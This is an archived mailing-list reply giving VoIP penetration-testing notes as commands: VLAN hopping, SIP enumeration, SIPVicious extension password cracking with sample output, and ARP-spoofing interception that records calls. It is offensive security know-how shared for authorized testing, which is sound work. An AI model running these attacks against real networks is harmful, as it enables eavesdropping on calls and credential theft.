Security Basics mailing list archives

Re: pentesting voip network-please help

From: Joseph McCray <joe () learnsecurityonline com>
Date: Mon, 01 Feb 2010 13:42:20 -0500

Welcome to Pentesting Marco...here are some snippets of my notes from a
previous VoIP pentest of mine. There are some other things you can do as
well - let me know the scope of the pentest and maybe I can help you
out.

##########################
# Attempt Voice VLAN Hop #
##########################
wget http://www.candelatech.com/~greear/vlan/vlan.1.9.tar.gz

tar -zxvf vlan.1.9.tar.gz

cd vlan

tshark -i eth0 -v -v "ether host 01:00:0c:cc:cc:cc and (ether[24:2] =
0x2000 or ether[20:2] = 0x2000)" | grep voice

vconfig add eth0 200                    # 200 is Voice VLAN ID in example

ifconfig eth0.200                       # Verify new interface was created

dhcpd -d -t 10 eth0.200                 # Try to get dhcp

        or

voiphopper



##################################
# Search for SIP enabled devices #
##################################
./smap -O [ip_address]/24

        or

./svmap.py -p3478,5060,5061,8000-8100,10000 [ip_address]/24


##############
# Sipvicious #
##############

        ###########################################
        # Identify active extensions (sipvicious) #
        ###########################################

        ./svwar.py [ip_address] -e1000-2000


        ##################################################
        # Attack the extensions found above (sipvicious) #
        ##################################################

        ./svcrack.py 2[ip_address] -u1023 -r1000-2000

        ###################################
        # Example sipvicious walk-through #
        ###################################
        [j0e@LinuxHacktop sipvicious]$ ./svmap.py [ip_address]
        | SIP Device         | User Agent   |
        -------------------------------------
        | [ip_address]:5060 | Asterisk PBX |
        
        [j0e@LinuxHacktop sipvicious]$ ./svwar.py [ip_address] 
        WARNING:root:found nothing
        [j0e@LinuxHacktop sipvicious]$ ./svwar.py [ip_address] -e1000-2000
        | Extension | Authentication |
        ------------------------------
        | 1023      | reqauth        |
        
        [j0e@LinuxHacktop sipvicious]$ ./svcrack.py [ip_address] -u1023
-r1000-2000
        | Extension | Password |
        ------------------------
        | 1023      | 1023     |


################################
# MITM for VoIP Call Recording #
################################
        Window 1
        arpspoof -i eth0 -t <spoofvictimip> <callmanager>

        Window 2
        fragrouter -B1

        Window 3
        wireshark & (Click Statistics | RTP | Show All Streams)
                        (Click one of the RTP steams and then select Analyze)
                                (Click Save Payload and you can save it as a .au or .raw file) 
                or
        vomit -r phone.dump | waveplay -S8000 -B16 -C1

-- 
Joe McCray

Toll Free:      1-866-892-2132
Email:          joe () learnsecurityonline com
LinkedIn:       http://www.linkedin.com/in/joemccray
Twitter:        http://twitter.com/j0emccray
Website:        http://www.learnsecurityonline.com

New Advanced Penetration Testing Course:
http://tinyurl.com/apt-course


Video of my Advanced SQL Injection Presentation:
http://tinyurl.com/j0e-McCray-sql-Injection


"The only thing worse than training good employees and losing them 
is NOT training your employees and keeping them." 

        - Zig Ziglar


------------------------------------------------------------------------
Securing Apache Web Server with thawte Digital Certificate
In this guide we examine the importance of Apache-SSL and who needs an SSL certificate.  We look at how SSL works, how 
it benefits your company and how your customers can tell if a site is secure. You will find out how to test, purchase, 
install and use a thawte Digital Certificate on your Apache web server. Throughout, best practices for set-up are 
highlighted to help you ensure efficient ongoing management of your encryption keys and digital certificates.

http://www.dinclinx.com/Redirect.aspx?36;4175;25;1371;0;5;946;e13b6be442f727d1
------------------------------------------------------------------------

Current thread:

pentesting voip network-please help mzcohen2682 (Feb 01)
- Re: pentesting voip network-please help Joseph McCray (Feb 01)
- Re: pentesting voip network-please help J. Oquendo (Feb 01)
  - Re: pentesting voip network-please help Ivan . (Feb 02)
- Re: pentesting voip network-please help Jan Muenther (Feb 01)
- Re: pentesting voip network-please help infolookup (Feb 02)
- Re: pentesting voip network-please help Champ Clark III [Softwink] (Feb 04)
- <Possible follow-ups>
- Re: pentesting voip network-please help Duren, Preston David (Feb 01)